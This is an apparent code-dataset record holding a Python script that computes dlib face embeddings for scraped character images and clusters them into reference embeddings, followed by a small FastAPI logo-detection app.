))
return image_jsons
def compute_reference(character,t=0.6,method='complete',KEEP_IMAGE_TYPES=None,keep_faces=False):
"""
Cluster over features then save the biggest cluster as reference.
The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`.
It should contain one line per reference embedding.
Parameters:
-----------
character: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features.
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
keep_faces: bool, optional
keep track of rgb image of faces (cropped with the bounding box) for debugging and visualization
Returns:
--------
references: numpy array,
contains one embedding per line
faces: list, optional
a list of all faces in the character images
Returns only if keep_faces
"""
features=[]
if keep_faces:
faces=[]
for feature_object,image_file in zip(character['features'],character['paths']):
if KEEP_IMAGE_TYPES is not None:
if feature_object['imageType'] not in KEEP_IMAGE_TYPES:
continue
if keep_faces:
rgb=imageio.imread(image_file)
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for feature in np.load(feature_object['path']):#this way we skip those that are empty (because no (frontal) face was detected)
features.append(feature["embeddings"])
if keep_faces:
left, top, right, bottom=scale_up_bbox(feature["bbox"],frame_width,frame_height)
faces.append(rgb[top:bottom,left:right])
if len(features) < 2:
return None
features=np.vstack(features)
#clustering
Z=linkage(features,method=method, metric='euclidean')
if t == 'auto':
clustering=fcluster_auto(features,Z, metric='euclidean')
else:
clustering=fcluster(Z,t,criterion='distance')
unique, counts = np.unique(clustering, return_counts=True)
biggest_cluster=unique[np.argmax(counts)]
references_i=np.where(clustering==biggest_cluster)[0]
references=features[references_i]
if keep_faces:
return references,faces
return references
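# Illustrative sketch (added; not used by the pipeline): the same
# linkage / fcluster recipe as compute_reference, run on synthetic embeddings
# standing in for dlib face descriptors.
def _demo_reference_clustering(n_faces=20, seed=0):
    """Return the biggest cluster of `n_faces` random 128-d embeddings."""
    rng = np.random.RandomState(seed)
    # Small random vectors so pairwise distances stay below DLIB_THRESHOLD
    # and most points end up in a single cluster.
    features = rng.rand(n_faces, EMBEDDING_DIM) * 0.05
    Z = linkage(features, method=CLUSTERING_METHOD, metric='euclidean')
    clustering = fcluster(Z, DLIB_THRESHOLD, criterion='distance')
    unique, counts = np.unique(clustering, return_counts=True)
    biggest_cluster = unique[np.argmax(counts)]
    return features[np.where(clustering == biggest_cluster)[0]]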
def compute_references(image_jsons,IMAGE_PATH,t=0.6,method='complete',KEEP_IMAGE_TYPES=None,keep_faces=False):
"""
Clusters over every image in image_jsons
then assigns to every cluster the most recurring label in the caption
Starts with the biggest clusters first
Parameters:
-----------
image_jsons: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
keep_faces: bool, optional
keep track of rgb image of faces (cropped with the bounding box)
for debugging and visualization.
Heavy in memory.
Defaults to False.
Returns:
--------
image_jsons: dict
updated database with the path towards the reference embedding
"""
features=[]
save_labels=[]
if keep_faces:
import matplotlib.pyplot as plt
faces=[]
#Clusters over every image in image_jsons
for i,image in enumerate(image_jsons['allImages']):
print((
f"\rimage {i+1}/{image_jsons['totalImageCount']}."
),end=" ")
if 'features' not in image:
continue
if KEEP_IMAGE_TYPES is not None:
if image['imageType'] not in KEEP_IMAGE_TYPES:
continue
if keep_faces:
rgb=imageio.imread(image['path'][0])
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for feature in np.load(image['features'][0]):#this way we skip those that are empty (because no (frontal) face was detected)
features.append(feature["embeddings"])
save_labels.append(image['label'])
if keep_faces:
left, top, right, bottom=scale_up_bbox(feature["bbox"],frame_width,frame_height)
faces.append(rgb[top:bottom,left:right])
features=np.vstack(features)
#clustering
Z=linkage(features,method=method, metric='euclidean')
if t == 'auto':
clustering=fcluster_auto(features,Z, metric='euclidean')
else:
clustering=fcluster(Z,t,criterion='distance')
unique, counts = np.unique(clustering, return_counts=True)
#assigns to every cluster the most recurring label in the caption
assigned_labels=[]
unassigned_clusters=[]
sorted_counts=np.sort(np.unique(counts))[::-1]
keep_centroid=[]
for count in sorted_counts:
for cluster in np.where(counts==count)[0]:#start with the biggest clusters
cluster_i=np.where(clustering==unique[cluster])[0]#get the indexes of the cluster
cluster_labels=np.array(save_labels)[cluster_i]#get the labels associated to the cluster
#flatten the labels
flat_cluster_labels = np.array([label for labels in cluster_labels for label in labels])
unique_labels, count_labels = np.unique(flat_cluster_labels, return_counts=True)
#assign the most reccuring label to the cluster
cluster_label=unique_labels[np.argmax(count_labels)]
#except if we already assigned it to a bigger cluster
if cluster_label in assigned_labels:
unassigned_clusters.append(cluster)
continue
#save reference and update image_jsons
str_KEEP_IMAGE_TYPES = ".".join(KEEP_IMAGE_TYPES) if KEEP_IMAGE_TYPES is not None else str(KEEP_IMAGE_TYPES)
output_path=os.path.join(IMAGE_PATH,cluster_label,f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{cluster_label}.{method}.{t}.references.npy')
np.save(output_path,features[cluster_i])
if "references" in image_jsons['characters'][cluster_label]:
image_jsons['characters'][cluster_label]["references"].append(output_path)
else:
image_jsons['characters'][cluster_label]["references"]=[output_path]
assigned_labels.append(cluster_label)
if keep_faces:
distance_from_cluster=np.mean(squareform(pdist(features[cluster_i],metric='euclidean')),axis=0)
centroid_face=faces[cluster_i[np.argmin(distance_from_cluster)]]
keep_centroid.append(centroid_face)
print(f"assigned {len(assigned_labels)} labels over {len(unique)} clusters")
print(f"those cluster were not assigned any label :\n{unassigned_clusters}")
if keep_faces:
plt.figure(figsize=(16,16))
cols=int(np.sqrt(len(assigned_labels)))+1
for i,label in enumerate(assigned_labels):
plt.subplot(cols,cols,i+1)
plt.title(label[:12]+str(image_jsons['characters'][label]['count']))
centroid_path=os.path.join(IMAGE_PATH,label,
f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{label}.{method}.{t}.centroid.png')
imageio.imwrite(centroid_path,keep_centroid[i])
image_jsons['characters'][label]["centroid"]=centroid_path
plt.axis('off')
plt.savefig(os.path.join(IMAGE_PATH,"centroids.png"))
return image_jsons
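# Illustrative sketch (added for clarity, not part of the original pipeline): the function
# above follows the usual scipy pattern -- build a linkage matrix over the embeddings, cut it
# at a distance threshold with fcluster, keep the biggest flat cluster and give it the most
# common label. The toy data and the name _demo_reference_cluster are hypothetical and the
# function is never called in this script.
def _demo_reference_cluster(threshold=0.6):
    import numpy as np
    from scipy.cluster.hierarchy import linkage, fcluster
    rng = np.random.RandomState(0)
    # two tight groups of 128-d "embeddings", mimicking faces of two characters
    embeddings = np.vstack([
        rng.normal(0.0, 0.01, (5, 128)),
        rng.normal(1.0, 0.01, (3, 128)),
    ])
    labels = [['character_a']] * 5 + [['character_b']] * 3
    Z = linkage(embeddings, method='complete', metric='euclidean')
    flat = fcluster(Z, t=threshold, criterion='distance')
    ids, counts = np.unique(flat, return_counts=True)
    biggest = ids[np.argmax(counts)]
    members = np.where(flat == biggest)[0]
    # majority label among the captions attached to the members of the biggest cluster
    member_labels = [label for i in members for label in labels[i]]
    majority = max(set(member_labels), key=member_labels.count)
    return embeddings[members], majority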
def compute_references_per_character(image_jsons,t=0.6,method='complete',MIN_IMAGES=1,KEEP_IMAGE_TYPES=None):
"""
    Cluster over each character folder if it has at least `MIN_IMAGES` image features in it
then save the biggest cluster as the character reference.
The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`.
It should contain one line per reference embedding.
Parameters:
-----------
image_jsons: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
MIN_IMAGES: int, optional
        compute the reference embeddings of every character which has at least MIN_IMAGES images.
Defaults to compute references for every character which has an image (i.e. 1)
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
Returns:
--------
image_jsons: dict
updated database with the path towards the reference embedding
"""
warnings.warn("This function has been deprecated in favor of compute_references")
n_characters=len(image_jsons['characters'])
for i,(name,character) in enumerate(image_jsons['characters'].items()):
print(f"\rprocessing {name} ({i}/{n_characters})",end=" ")
        #using len(character['features']) instead of character['count']
        # as some images do not contain a frontal face or are grayscale
if 'features' in character and len(character['features'])>=MIN_IMAGES:
references=compute_reference(character,t,method,KEEP_IMAGE_TYPES,keep_faces=False)
str_KEEP_IMAGE_TYPES = ".".join(KEEP_IMAGE_TYPES) if KEEP_IMAGE_TYPES is not None else str(KEEP_IMAGE_TYPES)
output_path=os.path.join(IMAGE_PATH,name,f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{name}.{method}.references.npy')
np.save(output_path,references)
if "references" in character:
image_jsons['characters'][name]["references"].append(output_path)
else:
image_jsons['characters'][name]["references"]=[output_path]
return image_jsons
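# Note (added): compute_references_per_character is kept for backwards compatibility but is
# deprecated; main() below runs the current pipeline, i.e. compute_features() followed by
# compute_references(), which clusters all images at once instead of one character at a time.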
def main(image_jsons,IMAGE_PATH):
image_jsons=compute_features(image_jsons,MODEL_NAME,DLIB_LANDMARKS,DLIB_EMBEDDING)
with open(os.path.join(IMAGE_PATH,"images.json"),"w") as file:
json.dump(image_jsons,file)
image_jsons=compute_references(image_jsons,IMAGE_PATH,CLUSTERING_THRESHOLD,CLUSTERING_METHOD,KEEP_IMAGE_TYPES,keep_faces=True)
print("\ndone computing features and references ;)")
return image_jsons
if __name__ == '__main__':
with open(os.path.join(IMAGE_PATH,"images.json"),"r") as file:
image_jsons=json.load(file)
image_jsons=main(image_jsons,IMAGE_PATH)
with open(os.path.join(IMAGE_PATH,"images.json"),"w") as file:
json.dump(image_jsons,file)
| #!/usr/bin/env python
# coding: utf-8
"""
Extracts features from images given an IMDB-compliant JSON file,
described in `CONTRIBUTING.md` (scraped in `image_scraping`)
"""
# Dependencies
## core
import numpy as np
import os
import json
import warnings
from shutil import copyfile
## ML/image processing
import imageio
from pyannote.video import Face
from pyannote.video.utils.scale_frame import scale_up_bbox, rectangle_to_bbox
## clustering
from pyannote.core.utils.distance import cdist,pdist
from scipy.spatial.distance import squareform
from scipy.cluster.hierarchy import fcluster
from pyannote.core.utils.hierarchy import linkage,fcluster_auto
#Hyperparameters are defined in scripts/images.py
MODEL_NAME="dlib_face_recognition_resnet_model_v1"
DLIB_MODELS="/people/lerner/pyannote/pyannote-video/dlib-models"
DLIB_EMBEDDING=os.path.join(DLIB_MODELS,f"{MODEL_NAME}.dat")
DLIB_LANDMARKS=os.path.join(DLIB_MODELS,"shape_predictor_68_face_landmarks.dat")
DLIB_THRESHOLD=0.6#threshold for clustering, see https://github.com/davisking/dlib-models
MIN_IMAGES=5
EMBEDDING_DIM=128
EMBEDDING_DTYPE=('embeddings', 'float64', (EMBEDDING_DIM,))
BBOX_DTYPE=('bbox', 'float64', (4,))
CLUSTERING_THRESHOLD=DLIB_THRESHOLD#'auto'
CLUSTERING_METHOD='complete'
KEEP_IMAGE_TYPES={'still_frame'}
def extract_image(rgb,landmarks_model,embedding_model,output,
return_landmarks=False,return_embedding=False):
"""Facial features detection for an rgb image
Parameters
----------
rgb : np.array
RGB image to be processed
landmarks : str
Path to dlib's 68 facial landmarks predictor model.
embedding : str
Path to dlib's face embedding model.
output : str
Path to features result file (should end with `.npy`).
return_landmarks : bool
Whether to save landmarks. Defaults to False.
return_embedding : bool
Whether to save embedding. Defaults to False.
"""
face = Face(landmarks=landmarks_model,embedding=embedding_model)
faces=[]
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for rectangle in face(rgb):
bbox=rectangle_to_bbox(rectangle,frame_width,frame_height)
result=(bbox,)
if return_landmarks or return_embedding:
landmarks = face.get_landmarks(rgb, rectangle)
if return_landmarks:
landmarks=parts_to_landmarks(landmarks,frame_width,frame_height)
result+=(landmarks,)
if return_embedding:
embedding = face.get_embedding(rgb, landmarks)
result+=(embedding,)
faces.append(result)
face_dtype=[BBOX_DTYPE]
if return_landmarks:
face_dtype+=[LANDMARKS_DTYPE]
if return_embedding:
face_dtype+=[EMBEDDING_DTYPE]
faces=np.array(
faces,
dtype=face_dtype
)
np.save(output,faces)
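# Illustrative sketch (added): extract_image stores each detection in a numpy structured
# array whose fields come from BBOX_DTYPE / EMBEDDING_DTYPE, so downstream code can read
# feature["bbox"] and feature["embeddings"] by name after np.load. The helper name and the
# /tmp path below are hypothetical and the function is never called in this script.
def _demo_structured_features(output="/tmp/demo_features.npy"):
    import numpy as np
    bbox = np.zeros(4)
    embedding = np.zeros(128)
    faces = np.array([(bbox, embedding)],
                     dtype=[('bbox', 'float64', (4,)),
                            ('embeddings', 'float64', (128,))])
    np.save(output, faces)
    for feature in np.load(output):
        assert feature["bbox"].shape == (4,)
        assert feature["embeddings"].shape == (128,)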
def image_to_output_path(image_path,MODEL_NAME):
dir_path,file_name=os.path.split(image_path)
file_uri=os.path.splitext(file_name)[0]
    #HACK should not be necessary if images have been scraped with a low enough MAX_FILE_NAME_LENGTH
if len(file_uri) > 128:
names,counter=file_uri.split(".")
names=names[:128]+"#trim#"
file_uri=f"{names}.{counter}"
output_path=os.path.join(dir_path,f"{MODEL_NAME}.{file_uri}.npy")
return output_path
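# Example (added, with made-up file names): with MODEL_NAME set to
# "dlib_face_recognition_resnet_model_v1", an image at
# "images/Arya_Stark/Arya_Stark.0.jpg" maps to
# "images/Arya_Stark/dlib_face_recognition_resnet_model_v1.Arya_Stark.0.npy".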
def compute_features(image_jsons,MODEL_NAME,DLIB_LANDMARKS,DLIB_EMBEDDING):
grayscale=0
no_image=0
not_exists=0
for i,image_json in enumerate(image_jsons['allImages']):
print((
f"\rimage {i+1}/{image_jsons['totalImageCount']}."
),end=" ")
image_path=image_json.get("path")
if image_path is not None:
image_path=image_path[0]
if not os.path.exists(image_path):
not_exists+=1
continue
else:
rgb = imageio.imread(image_path)
if len(rgb.shape)==2:
grayscale+=1
continue#dlib doesn't handle grayscale images
else:
no_image+=1
continue
output_path=image_to_output_path(image_path,MODEL_NAME)
extract_image(rgb,landmarks_model=DLIB_LANDMARKS,embedding_model=DLIB_EMBEDDING,output=output_path,
return_landmarks=False,return_embedding=True)
#update features path per image
image_jsons['allImages'][i]["features"]=[output_path]
for image_path in image_json['path'][1:]:
other_output_path=image_to_output_path(image_path,MODEL_NAME)
copyfile(output_path,other_output_path)
image_jsons['allImages'][i]["features"].append(other_output_path)
#update features path per character
feature_object={
"path":output_path,
"model_name":MODEL_NAME,
"imageType":image_json['imageType']
}
characters=image_json['label']
for character in characters:
if "features" in image_jsons['characters'][character]:
image_jsons['characters'][character]["features"].append(feature_object)
else:
image_jsons['characters'][character]["features"]=[feature_object]
print((
f"\nThere are {grayscale} grayscale images over {image_jsons['totalImageCount']-no_image-not_exists}.\n"
f"Over {image_jsons['totalImageCount']} images, {not_exists} do not exist "
f"and {no_image} were never scraped because of a lack of labelling."
))
return image_jsons
def compute_reference(character,t=0.6,method='complete',KEEP_IMAGE_TYPES=None,keep_faces=False):
"""
Cluster over features then save the biggest cluster as reference.
The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`.
It should contain one line per reference embedding.
Parameters:
-----------
character: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features.
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
keep_faces: bool, optional
keep track of rgb image of faces (cropped with the bounding box) for debugging and visualization
Returns:
--------
references: numpy array,
contains one embedding per line
faces: list, optional
a list of all faces in the character images
        Returned only if keep_faces is True
"""
features=[]
if keep_faces:
faces=[]
for feature_object,image_file in zip(character['features'],character['paths']):
if KEEP_IMAGE_TYPES is not None:
if feature_object['imageType'] not in KEEP_IMAGE_TYPES:
continue
if keep_faces:
rgb=imageio.imread(image_file)
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for feature in np.load(feature_object['path']):#this way we skip those that are empty (because no (frontal) face was detected)
features.append(feature["embeddings"])
if keep_faces:
left, top, right, bottom=scale_up_bbox(feature["bbox"],frame_width,frame_height)
faces.append(rgb[top:bottom,left:right])
if len(features) < 2:
return None
features=np.vstack(features)
#clustering
Z=linkage(features,method=method, metric='euclidean')
if t == 'auto':
clustering=fcluster_auto(features,Z, metric='euclidean')
else:
clustering=fcluster(Z,t,criterion='distance')
unique, counts = np.unique(clustering, return_counts=True)
biggest_cluster=unique[np.argmax(counts)]
references_i=np.where(clustering==biggest_cluster)[0]
references=features[references_i]
if keep_faces:
return references,faces
return references
def compute_references(image_jsons,IMAGE_PATH,t=0.6,method='complete',KEEP_IMAGE_TYPES=None,keep_faces=False):
"""
Clusters over every image in image_jsons
then assigns to every cluster the most recurring label in the caption
Starts with the biggest clusters first
Parameters:
-----------
image_jsons: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
keep_faces: bool, optional
keep track of rgb image of faces (cropped with the bounding box)
for debugging and visualization.
Heavy in memory.
Defaults to False.
Returns:
--------
image_jsons: dict
updated database with the path towards the reference embedding
"""
features=[]
save_labels=[]
if keep_faces:
import matplotlib.pyplot as plt
faces=[]
#Clusters over every image in image_jsons
for i,image in enumerate(image_jsons['allImages']):
print((
f"\rimage {i+1}/{image_jsons['totalImageCount']}."
),end=" ")
if 'features' not in image:
continue
if KEEP_IMAGE_TYPES is not None:
if image['imageType'] not in KEEP_IMAGE_TYPES:
continue
if keep_faces:
rgb=imageio.imread(image['path'][0])
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for feature in np.load(image['features'][0]):#this way we skip those that are empty (because no (frontal) face was detected)
features.append(feature["embeddings"])
save_labels.append(image['label'])
if keep_faces:
left, top, right, bottom=scale_up_bbox(feature["bbox"],frame_width,frame_height)
faces.append(rgb[top:bottom,left:right])
features=np.vstack(features)
#clustering
Z=linkage(features,method=method, metric='euclidean')
if t == 'auto':
clustering=fcluster_auto(features,Z, metric='euclidean')
else:
clustering=fcluster(Z,t,criterion='distance')
unique, counts = np.unique(clustering, return_counts=True)
#assigns to every cluster the most recurring label in the caption
assigned_labels=[]
unassigned_clusters=[]
sorted_counts=np.sort(np.unique(counts))[::-1]
keep_centroid=[]
for count in sorted_counts:
for cluster in np.where(counts==count)[0]:#start with the biggest clusters
cluster_i=np.where(clustering==unique[cluster])[0]#get the indexes of the cluster
cluster_labels=np.array(save_labels)[cluster_i]#get the labels associated to the cluster
#flatten the labels
flat_cluster_labels = np.array([label for labels in cluster_labels for label in labels])
unique_labels, count_labels = np.unique(flat_cluster_labels, return_counts=True)
            #assign the most recurring label to the cluster
cluster_label=unique_labels[np.argmax(count_labels)]
#except if we already assigned it to a bigger cluster
if cluster_label in assigned_labels:
unassigned_clusters.append(cluster)
continue
#save reference and update image_jsons
str_KEEP_IMAGE_TYPES = ".".join(KEEP_IMAGE_TYPES) if KEEP_IMAGE_TYPES is not None else str(KEEP_IMAGE_TYPES)
output_path=os.path.join(IMAGE_PATH,cluster_label,f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{cluster_label}.{method}.{t}.references.npy')
np.save(output_path,features[cluster_i])
if "references" in image_jsons['characters'][cluster_label]:
image_jsons['characters'][cluster_label]["references"].append(output_path)
else:
image_jsons['characters'][cluster_label]["references"]=[output_path]
assigned_labels.append(cluster_label)
if keep_faces:
distance_from_cluster=np.mean(squareform(pdist(features[cluster_i],metric='euclidean')),axis=0)
centroid_face=faces[cluster_i[np.argmin(distance_from_cluster)]]
keep_centroid.append(centroid_face)
print(f"assigned {len(assigned_labels)} labels over {len(unique)} clusters")
    print(f"those clusters were not assigned any label:\n{unassigned_clusters}")
if keep_faces:
plt.figure(figsize=(16,16))
cols=int(np.sqrt(len(assigned_labels)))+1
for i,label in enumerate(assigned_labels):
plt.subplot(cols,cols,i+1)
plt.title(label[:12]+str(image_jsons['characters'][label]['count']))
centroid_path=os.path.join(IMAGE_PATH,label,
f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{label}.{method}.{t}.centroid.png')
imageio.imwrite(centroid_path,keep_centroid[i])
image_jsons['characters'][label]["centroid"]=centroid_path
plt.axis('off')
plt.savefig(os.path.join(IMAGE_PATH,"centroids.png"))
return image_jsons
def compute_references_per_character(image_jsons,t=0.6,method='complete',MIN_IMAGES=1,KEEP_IMAGE_TYPES=None):
"""
    Cluster over each character folder if it has at least `MIN_IMAGES` image features in it
then save the biggest cluster as the character reference.
The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`.
It should contain one line per reference embedding.
Parameters:
-----------
image_jsons: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
MIN_IMAGES: int, optional
        compute the reference embeddings of every character which has at least MIN_IMAGES images.
Defaults to compute references for every character which has an image (i.e. 1)
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
Returns:
--------
image_jsons: dict
updated database with the path towards the reference embedding
"""
warnings.warn("This function has been deprecated in favor of compute_references")
n_characters=len(image_jsons['characters'])
for i,(name,character) in enumerate(image_jsons['characters'].items()):
print(f"\rprocessing {name} ({i}/{n_characters})",end=" ")
        #using len(character['features']) instead of character['count']
        # as some images do not contain a frontal face or are grayscale
if 'features' in character and len(character['features'])>=MIN_IMAGES:
references=compute_reference(character,t,method,KEEP_IMAGE_TYPES,keep_faces=False)
str_KEEP_IMAGE_TYPES = ".".join(KEEP_IMAGE_TYPES) if KEEP_IMAGE_TYPES is not None else str(KEEP_IMAGE_TYPES)
output_path=os.path.join(IMAGE_PATH,name,f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{name}.{method}.references.npy')
np.save(output_path,references)
if "references" in character:
image_jsons['characters'][name]["references"].append(output_path)
else:
image_jsons['characters'][name]["references"]=[output_path]
return image_jsons
def main(image_jsons,IMAGE_PATH):
image_jsons=compute_features(image_jsons,MODEL_NAME,DLIB_LANDMARKS,DLIB_EMBEDDING)
with open(os.path.join(IMAGE_PATH,"images.json"),"w") as file:
json.dump(image_jsons,file)
image_jsons=compute_references(image_jsons,IMAGE_PATH,CLUSTERING_THRESHOLD,CLUSTERING_METHOD,KEEP_IMAGE_TYPES,keep_faces=True)
print("\ndone computing features and references ;)")
return image_jsons
if __name__ == '__main__':
with open(os.path.join(IMAGE_PATH,"images.json"),"r") as file:
image_jsons=json.load(file)
image_jsons=main(image_jsons,IMAGE_PATH)
with open(os.path.join(IMAGE_PATH,"images.json"),"w") as file:
json.dump(image_jsons,file)
| en | 0.794151 | #!/usr/bin/env python # coding: utf-8 Extracts features from images given IMDB-compliant JSON file, described in `CONTRIBUTING.md` (scraped in `image_scraping`) # Dependencies ## core ## ML/image processing ## clustering #Hyperparameters are defined in scripts/images.py #threshold for clustering, see https://github.com/davisking/dlib-models #'auto' Facial features detection for an rgb image Parameters ---------- rgb : np.array RGB image to be processed landmarks : str Path to dlib's 68 facial landmarks predictor model. embedding : str Path to dlib's face embedding model. output : str Path to features result file (should end with `.npy`). return_landmarks : bool Whether to save landmarks. Defaults to False. return_embedding : bool Whether to save embedding. Defaults to False. #HACK should not be necessary if images have been scrapped with a low enough MAX_FILE_NAME_LENGTH #" #dlib doesn't handle grayscale images #update features path per image #update features path per character Cluster over features then save the biggest cluster as reference. The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`. It should contain one line per reference embedding. Parameters: ----------- character: dict described in `CONTRIBUTING.md`, it contains the path towards precomputed features. t: float, str, optional Threshold to apply when forming flat clusters. If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto to automatically determine the threshold Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models) method: str, optional Method used to calculate the distance between the newly formed cluster :math:`u` and each :math:`v` see scipy.cluster.hierarchy.linkage KEEP_IMAGE_TYPES: set, optional Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame') See `CONTRIBUTING.md` Defaults to keep all features (i.e. None) keep_faces: bool, optional keep track of rgb image of faces (cropped with the bounding box) for debugging and visualization Returns: -------- references: numpy array, contains one embedding per line faces: list, optional a list of all faces in the character images Returns only if keep_faces #this way we skip those that are empty (because no (frontal) face was detected) #clustering Clusters over every image in image_jsons then assigns to every cluster the most recurring label in the caption Starts with the biggest clusters first Parameters: ----------- image_jsons: dict described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character t: float, str, optional Threshold to apply when forming flat clusters. If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto to automatically determine the threshold Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models) method: str, optional Method used to calculate the distance between the newly formed cluster :math:`u` and each :math:`v` see scipy.cluster.hierarchy.linkage KEEP_IMAGE_TYPES: set, optional Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame') See `CONTRIBUTING.md` Defaults to keep all features (i.e. None) keep_faces: bool, optional keep track of rgb image of faces (cropped with the bounding box) for debugging and visualization. Heavy in memory. Defaults to False. 
Returns: -------- image_jsons: dict updated database with the path towards the reference embedding #Clusters over every image in image_jsons #this way we skip those that are empty (because no (frontal) face was detected) #clustering #assigns to every cluster the most recurring label in the caption #start with the biggest clusters #get the indexes of the cluster #get the labels associated to the cluster #flatten the labels #assign the most reccuring label to the cluster #except if we already assigned it to a bigger cluster #save reference and update image_jsons Cluster over each character folder if it has at least `MIN_IMAGES` images features in it then save the biggest cluster as the character reference. The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`. It should contain one line per reference embedding. Parameters: ----------- image_jsons: dict described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character t: float, str, optional Threshold to apply when forming flat clusters. If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto to automatically determine the threshold Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models) method: str, optional Method used to calculate the distance between the newly formed cluster :math:`u` and each :math:`v` see scipy.cluster.hierarchy.linkage MIN_IMAGES: int, optional compute the references embeddings of every character which has at least MIN_IMAGES. Defaults to compute references for every character which has an image (i.e. 1) KEEP_IMAGE_TYPES: set, optional Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame') See `CONTRIBUTING.md` Defaults to keep all features (i.e. None) Returns: -------- image_jsons: dict updated database with the path towards the reference embedding #using len(character['features']) instead of characer['count'] # as some images do not contain frontal face or are grayscale | 2.263963 | 2 |
src/api/app.py | DenisioMytnysiano/lodetta | 0 | 6616657 | import uvicorn
from fastapi import FastAPI
from starlette_exporter import PrometheusMiddleware, handle_metrics
from api.extensions.utils import get_logger
from database.populate import main as populate_database
from routers import LogoRouter, DetectorRouter
app = FastAPI(
title="Lodetta",
description="Simple and easily deployable logo detection API written in Python",
version="0.1.0"
)
app.add_middleware(PrometheusMiddleware)
app.add_route("/metrics", handle_metrics)
@app.on_event("startup")
async def startup():
populate_database()
@app.get("/", tags=["Root"])
async def root():
return {"message": "Welcome to lodetta - simple logo detection API."}
app.include_router(LogoRouter, tags=["Logo"], prefix="/logo")
app.include_router(DetectorRouter, tags=["Detector"], prefix="/detector")
if __name__ == '__main__':
uvicorn.run(app, port=8080, host='0.0.0.0')
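# Minimal smoke-test sketch (added): a FastAPI app can be exercised in-process with the
# bundled TestClient instead of starting uvicorn. This helper is illustrative only and is
# not called anywhere in this module.
def _smoke_test_root():
    from fastapi.testclient import TestClient
    client = TestClient(app)
    response = client.get("/")
    assert response.status_code == 200
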